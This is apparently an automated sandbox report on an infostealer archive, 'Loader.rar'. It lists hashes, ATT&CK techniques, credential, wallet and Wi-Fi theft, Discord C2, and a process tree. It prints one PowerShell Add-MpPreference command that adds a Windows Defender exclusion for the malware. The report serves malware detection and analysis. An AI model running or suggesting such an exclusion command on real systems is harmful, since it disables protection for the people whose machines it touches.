348dc41dc1e75835c4c49bd5b12849966734b44c54f4f4be00a7cb9ac5455861

Resubmissions

26/03/2025, 16:44

250326-t9brya1ls3 10

26/03/2025, 16:43

250326-t8ahgsyxbv 10

Analysis

max time kernel
173s
max time network
181s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
26/03/2025, 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.rar
Size

7.5MB
MD5

7d67a76a8354226bdef759e77559ef4b
SHA1

ce16e1d54a98f40f627d59fcad6731d4d1c7848e
SHA256

348dc41dc1e75835c4c49bd5b12849966734b44c54f4f4be00a7cb9ac5455861
SHA512

f6ab8dc861ac5a9c5f6970e747e13b3feba4bf78ea5aed9e0d9e0aba671a1ecc2fcf10ea878ce224794888231d9c4d9d32bc799975be7d4520e009300935e4a4
SSDEEP

196608:zg5D7Sn0mxSg0AWelXnsQs8uks0CCw8dipUHFIS87:zg5D203ghXnq1X0/daGIS87

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4212	powershell.exe
2460	powershell.exe
5824	powershell.exe
5276	powershell.exe
5556	powershell.exe
5364	powershell.exe
4944	powershell.exe
3828	powershell.exe
3472	powershell.exe
3172	powershell.exe
7056	powershell.exe
2476	powershell.exe
2944	powershell.exe
1416	powershell.exe
1920	powershell.exe
8	powershell.exe

Clipboard Data 1 TTPs 8 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3816	cmd.exe
872	powershell.exe
564	cmd.exe
6444	powershell.exe
6940	cmd.exe
5344	powershell.exe
3872	cmd.exe
5712	powershell.exe

Executes dropped EXE 16 IoCs

pid	Process
392	Loader.exe
5056	Loader.exe
872	rar.exe
5536	Loader.exe
5900	Loader.exe
5828	Loader.exe
5424	Loader.exe
3508	Loader.exe
4840	Loader.exe
4780	rar.exe
4848	Loader.exe
3392	Loader.exe
5420	rar.exe
1496	Loader.exe
3936	Loader.exe
1916	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5056	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5900	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
5424	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe
4840	Loader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\desktop.ini	firefox.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
3	discord.com
5	discord.com
8	discord.com
37	discord.com
60	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 12 IoCs

discovery

Process Discovery

T1057

pid	Process
6868	tasklist.exe
6064	tasklist.exe
4480	tasklist.exe
1132	tasklist.exe
1360	tasklist.exe
6436	tasklist.exe
6916	tasklist.exe
7016	tasklist.exe
5424	tasklist.exe
4876	tasklist.exe
4940	tasklist.exe
4416	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b247-34.dat	upx
behavioral1/memory/5056-38-0x00007FFDC9330000-0x00007FFDC99F2000-memory.dmp	upx
behavioral1/files/0x001900000002b232-41.dat	upx
behavioral1/files/0x001900000002b243-44.dat	upx
behavioral1/files/0x001900000002b231-53.dat	upx
behavioral1/files/0x001900000002b23d-61.dat	upx
behavioral1/memory/5056-63-0x00007FFDD28C0000-0x00007FFDD28D9000-memory.dmp	upx
behavioral1/memory/5056-65-0x00007FFDCD630000-0x00007FFDCD65C000-memory.dmp	upx
behavioral1/files/0x001900000002b237-64.dat	upx
behavioral1/files/0x004900000002b23c-60.dat	upx
behavioral1/files/0x001900000002b23b-59.dat	upx
behavioral1/files/0x001900000002b238-58.dat	upx
behavioral1/files/0x001d00000002b236-56.dat	upx
behavioral1/files/0x001900000002b235-55.dat	upx
behavioral1/memory/5056-54-0x00007FFDD2950000-0x00007FFDD295F000-memory.dmp	upx
behavioral1/files/0x001c00000002b24e-52.dat	upx
behavioral1/files/0x001900000002b24d-51.dat	upx
behavioral1/files/0x001900000002b24a-50.dat	upx
behavioral1/files/0x001900000002b244-47.dat	upx
behavioral1/files/0x001c00000002b242-46.dat	upx
behavioral1/memory/5056-43-0x00007FFDCDE00000-0x00007FFDCDE25000-memory.dmp	upx
behavioral1/memory/5056-71-0x00007FFDCD600000-0x00007FFDCD624000-memory.dmp	upx
behavioral1/memory/5056-73-0x00007FFDC91B0000-0x00007FFDC932F000-memory.dmp	upx
behavioral1/memory/5056-77-0x00007FFDD2890000-0x00007FFDD289D000-memory.dmp	upx
behavioral1/memory/5056-76-0x00007FFDCF2F0000-0x00007FFDCF309000-memory.dmp	upx
behavioral1/memory/5056-84-0x00007FFDC9BA0000-0x00007FFDC9C6E000-memory.dmp	upx
behavioral1/memory/5056-83-0x00007FFDC9330000-0x00007FFDC99F2000-memory.dmp	upx
behavioral1/memory/5056-79-0x00007FFDCD540000-0x00007FFDCD573000-memory.dmp	upx
behavioral1/memory/5056-86-0x00007FFDC4930000-0x00007FFDC4E63000-memory.dmp	upx
behavioral1/memory/5056-93-0x00007FFDC9090000-0x00007FFDC91AA000-memory.dmp	upx
behavioral1/memory/5056-91-0x00007FFDCD7D0000-0x00007FFDCD7DD000-memory.dmp	upx
behavioral1/memory/5056-90-0x00007FFDCF230000-0x00007FFDCF244000-memory.dmp	upx
behavioral1/memory/5056-87-0x00007FFDCDE00000-0x00007FFDCDE25000-memory.dmp	upx
behavioral1/memory/5056-116-0x00007FFDCD600000-0x00007FFDCD624000-memory.dmp	upx
behavioral1/memory/5056-126-0x00007FFDC91B0000-0x00007FFDC932F000-memory.dmp	upx
behavioral1/memory/5056-281-0x00007FFDCD540000-0x00007FFDCD573000-memory.dmp	upx
behavioral1/memory/5056-296-0x00007FFDC9BA0000-0x00007FFDC9C6E000-memory.dmp	upx
behavioral1/memory/5056-307-0x00007FFDC4930000-0x00007FFDC4E63000-memory.dmp	upx
behavioral1/memory/5056-331-0x00007FFDC9090000-0x00007FFDC91AA000-memory.dmp	upx
behavioral1/memory/5056-317-0x00007FFDC9330000-0x00007FFDC99F2000-memory.dmp	upx
behavioral1/memory/5056-323-0x00007FFDC91B0000-0x00007FFDC932F000-memory.dmp	upx
behavioral1/memory/5056-318-0x00007FFDCDE00000-0x00007FFDCDE25000-memory.dmp	upx
behavioral1/memory/5056-332-0x00007FFDC9330000-0x00007FFDC99F2000-memory.dmp	upx
behavioral1/memory/5056-360-0x00007FFDC9090000-0x00007FFDC91AA000-memory.dmp	upx
behavioral1/memory/5056-359-0x00007FFDCD7D0000-0x00007FFDCD7DD000-memory.dmp	upx
behavioral1/memory/5056-358-0x00007FFDCF230000-0x00007FFDCF244000-memory.dmp	upx
behavioral1/memory/5056-357-0x00007FFDC9BA0000-0x00007FFDC9C6E000-memory.dmp	upx
behavioral1/memory/5056-356-0x00007FFDCD540000-0x00007FFDCD573000-memory.dmp	upx
behavioral1/memory/5056-355-0x00007FFDCF2F0000-0x00007FFDCF309000-memory.dmp	upx
behavioral1/memory/5056-354-0x00007FFDD2890000-0x00007FFDD289D000-memory.dmp	upx
behavioral1/memory/5056-353-0x00007FFDC91B0000-0x00007FFDC932F000-memory.dmp	upx
behavioral1/memory/5056-352-0x00007FFDCD600000-0x00007FFDCD624000-memory.dmp	upx
behavioral1/memory/5056-351-0x00007FFDCD630000-0x00007FFDCD65C000-memory.dmp	upx
behavioral1/memory/5056-350-0x00007FFDD28C0000-0x00007FFDD28D9000-memory.dmp	upx
behavioral1/memory/5056-349-0x00007FFDD2950000-0x00007FFDD295F000-memory.dmp	upx
behavioral1/memory/5056-348-0x00007FFDCDE00000-0x00007FFDCDE25000-memory.dmp	upx
behavioral1/memory/5056-347-0x00007FFDC4930000-0x00007FFDC4E63000-memory.dmp	upx
behavioral1/memory/5900-392-0x00007FFDC9330000-0x00007FFDC99F2000-memory.dmp	upx
behavioral1/memory/5900-393-0x00007FFDD2950000-0x00007FFDD295F000-memory.dmp	upx
behavioral1/memory/5900-394-0x00007FFDD28C0000-0x00007FFDD28D9000-memory.dmp	upx
behavioral1/memory/5900-395-0x00007FFDCD630000-0x00007FFDCD65C000-memory.dmp	upx
behavioral1/memory/5900-400-0x00007FFDC91B0000-0x00007FFDC932F000-memory.dmp	upx
behavioral1/memory/5900-402-0x00007FFDD2890000-0x00007FFDD289D000-memory.dmp	upx
behavioral1/memory/5900-401-0x00007FFDCF2F0000-0x00007FFDCF309000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5900	netsh.exe
1836	cmd.exe
5260	netsh.exe
4084	cmd.exe
6508	netsh.exe
7100	cmd.exe
3872	netsh.exe
2424	cmd.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1996	WMIC.exe
5924	WMIC.exe
5064	WMIC.exe
1272	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 4 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3576	systeminfo.exe
4884	systeminfo.exe
6516	systeminfo.exe
6384	systeminfo.exe

Kills process with taskkill 18 IoCs

defense_evasion

pid	Process
6416	taskkill.exe
6880	taskkill.exe
3236	taskkill.exe
4500	taskkill.exe
6404	taskkill.exe
6972	taskkill.exe
7072	taskkill.exe
6656	taskkill.exe
3840	taskkill.exe
6752	taskkill.exe
760	taskkill.exe
6992	taskkill.exe
6420	taskkill.exe
6732	taskkill.exe
3388	taskkill.exe
6512	taskkill.exe
4432	taskkill.exe
6336	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133874812539620697"	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4212	powershell.exe
2476	powershell.exe
4212	powershell.exe
2476	powershell.exe
5712	powershell.exe
5712	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4944	powershell.exe
4944	powershell.exe
5028	powershell.exe
5028	powershell.exe
3828	powershell.exe
3828	powershell.exe
5568	powershell.exe
5568	powershell.exe
1424	7zFM.exe
1424	7zFM.exe
3472	powershell.exe
2460	powershell.exe
3472	powershell.exe
2460	powershell.exe
872	powershell.exe
872	powershell.exe
5600	powershell.exe
5600	powershell.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
872	powershell.exe
1424	7zFM.exe
1424	7zFM.exe
5600	powershell.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1424	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1424	7zFM.exe
Token: 35	1424	7zFM.exe
Token: SeSecurityPrivilege	1424	7zFM.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	4876	tasklist.exe
Token: SeDebugPrivilege	5424	tasklist.exe
Token: SeDebugPrivilege	5712	powershell.exe
Token: SeIncreaseQuotaPrivilege	2800	WMIC.exe
Token: SeSecurityPrivilege	2800	WMIC.exe
Token: SeTakeOwnershipPrivilege	2800	WMIC.exe
Token: SeLoadDriverPrivilege	2800	WMIC.exe
Token: SeSystemProfilePrivilege	2800	WMIC.exe
Token: SeSystemtimePrivilege	2800	WMIC.exe
Token: SeProfSingleProcessPrivilege	2800	WMIC.exe
Token: SeIncBasePriorityPrivilege	2800	WMIC.exe
Token: SeCreatePagefilePrivilege	2800	WMIC.exe
Token: SeBackupPrivilege	2800	WMIC.exe
Token: SeRestorePrivilege	2800	WMIC.exe
Token: SeShutdownPrivilege	2800	WMIC.exe
Token: SeDebugPrivilege	2800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2800	WMIC.exe
Token: SeRemoteShutdownPrivilege	2800	WMIC.exe
Token: SeUndockPrivilege	2800	WMIC.exe
Token: SeManageVolumePrivilege	2800	WMIC.exe
Token: 33	2800	WMIC.exe
Token: 34	2800	WMIC.exe
Token: 35	2800	WMIC.exe
Token: 36	2800	WMIC.exe
Token: SeDebugPrivilege	6064	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2800	WMIC.exe
Token: SeSecurityPrivilege	2800	WMIC.exe
Token: SeTakeOwnershipPrivilege	2800	WMIC.exe
Token: SeLoadDriverPrivilege	2800	WMIC.exe
Token: SeSystemProfilePrivilege	2800	WMIC.exe
Token: SeSystemtimePrivilege	2800	WMIC.exe
Token: SeProfSingleProcessPrivilege	2800	WMIC.exe
Token: SeIncBasePriorityPrivilege	2800	WMIC.exe
Token: SeCreatePagefilePrivilege	2800	WMIC.exe
Token: SeBackupPrivilege	2800	WMIC.exe
Token: SeRestorePrivilege	2800	WMIC.exe
Token: SeShutdownPrivilege	2800	WMIC.exe
Token: SeDebugPrivilege	2800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2800	WMIC.exe
Token: SeRemoteShutdownPrivilege	2800	WMIC.exe
Token: SeUndockPrivilege	2800	WMIC.exe
Token: SeManageVolumePrivilege	2800	WMIC.exe
Token: 33	2800	WMIC.exe
Token: 34	2800	WMIC.exe
Token: 35	2800	WMIC.exe
Token: 36	2800	WMIC.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeIncreaseQuotaPrivilege	1084	WMIC.exe
Token: SeSecurityPrivilege	1084	WMIC.exe
Token: SeTakeOwnershipPrivilege	1084	WMIC.exe
Token: SeLoadDriverPrivilege	1084	WMIC.exe
Token: SeSystemProfilePrivilege	1084	WMIC.exe
Token: SeSystemtimePrivilege	1084	WMIC.exe
Token: SeProfSingleProcessPrivilege	1084	WMIC.exe
Token: SeIncBasePriorityPrivilege	1084	WMIC.exe
Token: SeCreatePagefilePrivilege	1084	WMIC.exe
Token: SeBackupPrivilege	1084	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
1424	7zFM.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
4944	firefox.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
1424	7zFM.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe
5676	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4944	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 392	1424	7zFM.exe	79
PID 1424 wrote to memory of 392	1424	7zFM.exe	79
PID 392 wrote to memory of 5056	392	Loader.exe	82
PID 392 wrote to memory of 5056	392	Loader.exe	82
PID 5056 wrote to memory of 1084	5056	Loader.exe	83
PID 5056 wrote to memory of 1084	5056	Loader.exe	83
PID 5056 wrote to memory of 3672	5056	Loader.exe	84
PID 5056 wrote to memory of 3672	5056	Loader.exe	84
PID 1084 wrote to memory of 4212	1084	cmd.exe	87
PID 1084 wrote to memory of 4212	1084	cmd.exe	87
PID 3672 wrote to memory of 2476	3672	cmd.exe	88
PID 3672 wrote to memory of 2476	3672	cmd.exe	88
PID 5056 wrote to memory of 4912	5056	Loader.exe	89
PID 5056 wrote to memory of 4912	5056	Loader.exe	89
PID 5056 wrote to memory of 4436	5056	Loader.exe	90
PID 5056 wrote to memory of 4436	5056	Loader.exe	90
PID 5056 wrote to memory of 536	5056	Loader.exe	93
PID 5056 wrote to memory of 536	5056	Loader.exe	93
PID 5056 wrote to memory of 3872	5056	Loader.exe	94
PID 5056 wrote to memory of 3872	5056	Loader.exe	94
PID 5056 wrote to memory of 2032	5056	Loader.exe	96
PID 5056 wrote to memory of 2032	5056	Loader.exe	96
PID 4912 wrote to memory of 4876	4912	cmd.exe	99
PID 4912 wrote to memory of 4876	4912	cmd.exe	99
PID 4436 wrote to memory of 5424	4436	cmd.exe	100
PID 4436 wrote to memory of 5424	4436	cmd.exe	100
PID 3872 wrote to memory of 5712	3872	cmd.exe	101
PID 3872 wrote to memory of 5712	3872	cmd.exe	101
PID 5056 wrote to memory of 3844	5056	Loader.exe	102
PID 5056 wrote to memory of 3844	5056	Loader.exe	102
PID 536 wrote to memory of 2800	536	cmd.exe	103
PID 536 wrote to memory of 2800	536	cmd.exe	103
PID 5056 wrote to memory of 2424	5056	Loader.exe	105
PID 5056 wrote to memory of 2424	5056	Loader.exe	105
PID 2032 wrote to memory of 6064	2032	cmd.exe	106
PID 2032 wrote to memory of 6064	2032	cmd.exe	106
PID 2424 wrote to memory of 5900	2424	cmd.exe	109
PID 2424 wrote to memory of 5900	2424	cmd.exe	109
PID 3844 wrote to memory of 4100	3844	cmd.exe	110
PID 3844 wrote to memory of 4100	3844	cmd.exe	110
PID 5056 wrote to memory of 4564	5056	Loader.exe	111
PID 5056 wrote to memory of 4564	5056	Loader.exe	111
PID 5056 wrote to memory of 4180	5056	Loader.exe	113
PID 5056 wrote to memory of 4180	5056	Loader.exe	113
PID 4564 wrote to memory of 3576	4564	cmd.exe	115
PID 4564 wrote to memory of 3576	4564	cmd.exe	115
PID 5056 wrote to memory of 5988	5056	Loader.exe	116
PID 5056 wrote to memory of 5988	5056	Loader.exe	116
PID 4180 wrote to memory of 4764	4180	cmd.exe	118
PID 4180 wrote to memory of 4764	4180	cmd.exe	118
PID 5988 wrote to memory of 1544	5988	cmd.exe	119
PID 5988 wrote to memory of 1544	5988	cmd.exe	119
PID 5056 wrote to memory of 5564	5056	Loader.exe	120
PID 5056 wrote to memory of 5564	5056	Loader.exe	120
PID 5564 wrote to memory of 5968	5564	cmd.exe	122
PID 5564 wrote to memory of 5968	5564	cmd.exe	122
PID 5056 wrote to memory of 5236	5056	Loader.exe	123
PID 5056 wrote to memory of 5236	5056	Loader.exe	123
PID 5236 wrote to memory of 3664	5236	cmd.exe	125
PID 5236 wrote to memory of 3664	5236	cmd.exe	125
PID 5056 wrote to memory of 3580	5056	Loader.exe	126
PID 5056 wrote to memory of 3580	5056	Loader.exe	126
PID 4764 wrote to memory of 4844	4764	powershell.exe	128
PID 4764 wrote to memory of 4844	4764	powershell.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Loader.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:392
- - C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1084
